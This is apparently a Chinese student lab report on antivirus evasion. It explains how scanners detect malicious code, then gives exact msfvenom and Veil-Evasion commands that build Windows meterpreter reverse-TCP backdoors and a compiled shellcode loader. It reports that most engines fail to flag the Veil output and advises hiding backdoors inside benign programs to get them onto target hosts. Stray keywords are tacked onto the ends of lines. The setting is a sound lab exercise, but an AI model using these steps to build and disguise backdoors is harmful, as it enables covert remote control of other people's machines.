•理解免杀技术原理python
•正确使用msf编码器,veil-evasion,本身利用shellcode编程等免杀工具或技巧shell
(1)杀软是如何检测出恶意代码的?编程
1*恶意代码通常具备明显的特征码,依据特征码来判断是不是恶意代码windows
2*若是一个程序的行为是带有恶意的行为,也会被检测为恶意代码数组
(2)免杀是作什么?tcp
免杀就是避免杀软的查杀与检测工具
(3)免杀的基本方法有哪些?编码
•改变特征码3d
•尽可能避免杀软检测到带有恶意的行为,如使用反弹式链接code
实验过程当中使用的是virscan来进行在线查毒,很是方便
·按照前一次实验的操做,用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.184.128 LPORT=5228 -f exe > 20145228.exe
来生成一个后门程序
·而后利用ncat指令传送到主机
·最后检测结果:
基本均可以发现这是个恶意代码
·Veil-Evasion是一个与Metasploit有点相似的软件,已经在kali虚拟机里,若是没有能够进行在线安装
·直接输入veil-evasion
打开
·而后依次键入如下指令:
use python/meterpreter/rev_tcp
//设置payload
set LHOST 192.168.88.144
//设置反弹链接IP
set LPORT 5228
//设置反弹端口5228,默认为4444
generate
//生成
145213
//程序名
以结果图可知,该可执行文件存在kali计算机的/var/lib/veil-evasion/output/compiled/文件夹里。
检测结果:
此次基本没几个能检测出来了
•使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.3 LPORT=5228 -f c
命令生成一个C语言shellcode数组
•而后将这段数组在VC上进行编写shellcode
•在Kali下使用msf监听,运行刚刚编译生成的可执行文件,成功获取权限。
最后再去检测
附上个人杀软版本:
清楚地了解了杀毒软件查杀的原理,如何使得本身的恶意代码免杀、恶意代码的假装。一款杀软的检测并不能表明最后的结果
最重要的是后门的假装,较好的方法是隐藏到一些非恶意程序里再进入目标主机